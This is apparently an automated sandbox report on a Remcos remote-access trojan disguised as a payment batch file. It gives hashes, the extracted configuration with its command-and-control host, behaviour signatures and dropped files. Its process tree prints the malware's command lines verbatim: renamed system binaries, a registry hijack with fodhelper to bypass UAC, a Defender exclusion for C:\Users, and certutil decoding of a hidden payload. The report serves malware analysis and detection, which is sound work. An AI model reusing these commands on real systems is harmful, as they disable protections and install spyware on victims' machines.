remcos | 7d881f1bb1a442fbdc2eb1ce15e67bd8b891695029b9e51ea7249fe164dc907a

General

Target

Swift Payment Copy USD20,000.00.bat
Size

2.6MB
MD5

27e2b004580551fed5ba3913b5822db2
SHA1

433160f0c98bb1834c306537045670bab9f0904b
SHA256

7d881f1bb1a442fbdc2eb1ce15e67bd8b891695029b9e51ea7249fe164dc907a
SHA512

a7239e36f0e9206a48b388e3de388a3caa28499c79e85cd9440b9382d869169564ac6098fddef8cf50cd34051e741b57b88f30f18186b071b07d900893f31453
SSDEEP

24576:y4OFE//5zvMYNepZRuIQXZQ2FiBvmcH/Y+tOGlhjFk99Qk:piAtvpcqXZQ2sIOA4OGlhjFk99x

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jaztc.duckdns.org:1808

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
sfsfdrgrre
mouse_option
false
mutex
Rmc-AJ5P19
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

xkn.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation xkn.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation	xkn.exe

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2844	alpha.exe
1116	alpha.exe
2284	alpha.exe
3136	xkn.exe
2080	alpha.exe
1276	alpha.exe
3452	kn.exe
1848	alpha.exe
2140	kn.exe
892	Lewxa.com
4532	alpha.exe
960	alpha.exe
2524	alpha.exe
1052	alpha.exe
4460	alpha.exe
1104	alpha.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2080 taskkill.exe
1248 taskkill.exe

pid	process
2080	taskkill.exe
1248	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3720 reg.exe

pid	process
3720	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	60	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

xkn.exepowershell.exe

pid process

3136 xkn.exe
3136 xkn.exe
2408 powershell.exe
2408 powershell.exe
2408 powershell.exe

pid	process
3136	xkn.exe
3136	xkn.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3136	xkn.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	2408	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

SndVol.exe

pid process

3636 SndVol.exe

pid	process
3636	SndVol.exe

Suspicious use of WriteProcessMemory 57 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exealpha.execmd.exe3785381.execmd.execmd.exe

description	pid	process	target process
PID 2656 wrote to memory of 2404	2656	cmd.exe	cmd.exe
PID 2656 wrote to memory of 2404	2656	cmd.exe	cmd.exe
PID 2404 wrote to memory of 5012	2404	cmd.exe	extrac32.exe
PID 2404 wrote to memory of 5012	2404	cmd.exe	extrac32.exe
PID 2656 wrote to memory of 2844	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 2844	2656	cmd.exe	alpha.exe
PID 2844 wrote to memory of 2716	2844	alpha.exe	extrac32.exe
PID 2844 wrote to memory of 2716	2844	alpha.exe	extrac32.exe
PID 2656 wrote to memory of 1116	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 1116	2656	cmd.exe	alpha.exe
PID 1116 wrote to memory of 3092	1116	alpha.exe	extrac32.exe
PID 1116 wrote to memory of 3092	1116	alpha.exe	extrac32.exe
PID 2656 wrote to memory of 2284	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 2284	2656	cmd.exe	alpha.exe
PID 2284 wrote to memory of 3136	2284	alpha.exe	xkn.exe
PID 2284 wrote to memory of 3136	2284	alpha.exe	xkn.exe
PID 3136 wrote to memory of 2080	3136	xkn.exe	alpha.exe
PID 3136 wrote to memory of 2080	3136	xkn.exe	alpha.exe
PID 2080 wrote to memory of 3720	2080	alpha.exe	reg.exe
PID 2080 wrote to memory of 3720	2080	alpha.exe	reg.exe
PID 3136 wrote to memory of 1344	3136	xkn.exe	fodhelper.exe
PID 3136 wrote to memory of 1344	3136	xkn.exe	fodhelper.exe
PID 2656 wrote to memory of 1276	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 1276	2656	cmd.exe	alpha.exe
PID 1276 wrote to memory of 3452	1276	alpha.exe	kn.exe
PID 1276 wrote to memory of 3452	1276	alpha.exe	kn.exe
PID 2656 wrote to memory of 1848	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 1848	2656	cmd.exe	alpha.exe
PID 1848 wrote to memory of 2140	1848	alpha.exe	kn.exe
PID 1848 wrote to memory of 2140	1848	alpha.exe	kn.exe
PID 2656 wrote to memory of 892	2656	cmd.exe	Lewxa.com
PID 2656 wrote to memory of 892	2656	cmd.exe	Lewxa.com
PID 2656 wrote to memory of 892	2656	cmd.exe	Lewxa.com
PID 2656 wrote to memory of 4532	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 4532	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 960	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 960	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 2524	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 2524	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 1052	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 1052	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 4460	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 4460	2656	cmd.exe	alpha.exe
PID 4460 wrote to memory of 1248	4460	alpha.exe	taskkill.exe
PID 4460 wrote to memory of 1248	4460	alpha.exe	taskkill.exe
PID 2656 wrote to memory of 1104	2656	cmd.exe	alpha.exe
PID 2656 wrote to memory of 1104	2656	cmd.exe	alpha.exe
PID 1104 wrote to memory of 2080	1104	alpha.exe	taskkill.exe
PID 1104 wrote to memory of 2080	1104	alpha.exe	taskkill.exe
PID 4612 wrote to memory of 3092	4612	cmd.exe	3785381.exe
PID 4612 wrote to memory of 3092	4612	cmd.exe	3785381.exe
PID 3092 wrote to memory of 2076	3092	3785381.exe	cmd.exe
PID 3092 wrote to memory of 2076	3092	3785381.exe	cmd.exe
PID 2076 wrote to memory of 3552	2076	cmd.exe	cmd.exe
PID 2076 wrote to memory of 3552	2076	cmd.exe	cmd.exe
PID 3552 wrote to memory of 2408	3552	cmd.exe	powershell.exe
PID 3552 wrote to memory of 2408	3552	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Swift Payment Copy USD20,000.00.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:5012

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2716

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:3092

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2284

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2080

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:3720

C:\Windows\system32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
4⤵
PID:1344

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Swift Payment Copy USD20,000.00.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1276

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Swift Payment Copy USD20,000.00.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:3452

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1848

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:2140

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
PID:892

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows "
3⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows \System32"
3⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Windows \System32\3785381.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows \System32\3785381.exe
"C:\Windows \System32\3785381.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
5⤵
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\system32\cmd.exe
cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
6⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
3⤵
- Suspicious use of SetWindowsHookEx
PID:3636

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4532

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:960

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2524

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1052

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4460

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:3552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\sfsfdrgrre\logs.dat

Filesize
144B

MD5
7ba094d25801ddf52aae2bcdfb92069b

SHA1
1ad5af4b5327bd2b303fbb7862c2db30ebee0e19

SHA256
b7d4fab6f854d1e75f2f9e97c3dbe009b86948831309489291314e47c275d980

SHA512
262059a56539116e5f95ed3fd7fdb6cba3e8e43d8db4f4357f19e03ef4dc1124fbc22226f3d7795aed2e7f75c871d243d497536f8a97d9d4f44027e44a3432d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0azeplc5.5gw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Lewxa.txt

Filesize
1.9MB

MD5
ebc0f4956eb495835d78cccf506bacda

SHA1
59c0d14657f98f60ed121c842e10d68434690de7

SHA256
850e3a6656ceb8e29fb4eb7fec103f8413f7338011e750fd1acabb8dde1c355a

SHA512
1012ff20eae261208fe366408853d602a0e9befba85d0c1c64f76ea3c12d08d4990d7c38216b186ccd26d8a86e3495ffc6f45cc44e9fe356987715702d49b840

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
955KB

MD5
0eec5660338db7b5de48096339539571

SHA1
30be6048f0c5b8aefef81e11193ab20f44991923

SHA256
bb48d576e589f33983b22ff5f87c15876f10e7d126f67853cf57f4e5916de142

SHA512
df59442fca3801b39c1fe2e8e3ee97ca74e5ad3fef82033d4f46dc1f2bf84c3df2494391cb31f3a9d942d69e5f6c87a830be3770d46755a59a362ac2812354b8

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/892-58-0x0000000074150000-0x0000000074162000-memory.dmp

Filesize
72KB

Download
memory/892-68-0x0000000074150000-0x0000000074162000-memory.dmp

Filesize
72KB

Download
memory/892-63-0x0000000074120000-0x0000000074132000-memory.dmp

Filesize
72KB

Download
memory/892-94-0x0000000074150000-0x0000000074162000-memory.dmp

Filesize
72KB

Download
memory/892-55-0x0000000000400000-0x00000000004F8000-memory.dmp

Filesize
992KB

Download
memory/892-57-0x00000000751C0000-0x00000000751D3000-memory.dmp

Filesize
76KB

Download
memory/2408-75-0x00007FFCEB820000-0x00007FFCEC2E1000-memory.dmp

Filesize
10.8MB

Download
memory/2408-85-0x00000297540E0000-0x00000297540F0000-memory.dmp

Filesize
64KB

Download
memory/2408-86-0x00000297540E0000-0x00000297540F0000-memory.dmp

Filesize
64KB

Download
memory/2408-90-0x00007FFCEB820000-0x00007FFCEC2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3092-74-0x00000000613C0000-0x00000000613E3000-memory.dmp

Filesize
140KB

Download
memory/3136-35-0x00007FFCED660000-0x00007FFCEE121000-memory.dmp

Filesize
10.8MB

Download
memory/3136-32-0x00000239DEA80000-0x00000239DEA90000-memory.dmp

Filesize
64KB

Download
memory/3136-29-0x00000239DEA80000-0x00000239DEA90000-memory.dmp

Filesize
64KB

Download
memory/3136-28-0x00000239DEA80000-0x00000239DEA90000-memory.dmp

Filesize
64KB

Download
memory/3136-27-0x00007FFCED660000-0x00007FFCEE121000-memory.dmp

Filesize
10.8MB

Download
memory/3136-22-0x00000239F8D50000-0x00000239F8D72000-memory.dmp

Filesize
136KB

Download
memory/3636-102-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-103-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-104-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-105-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-106-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-110-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-114-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-115-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-100-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-122-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-123-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-130-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download
memory/3636-131-0x0000000000800000-0x0000000001800000-memory.dmp

Filesize
16.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads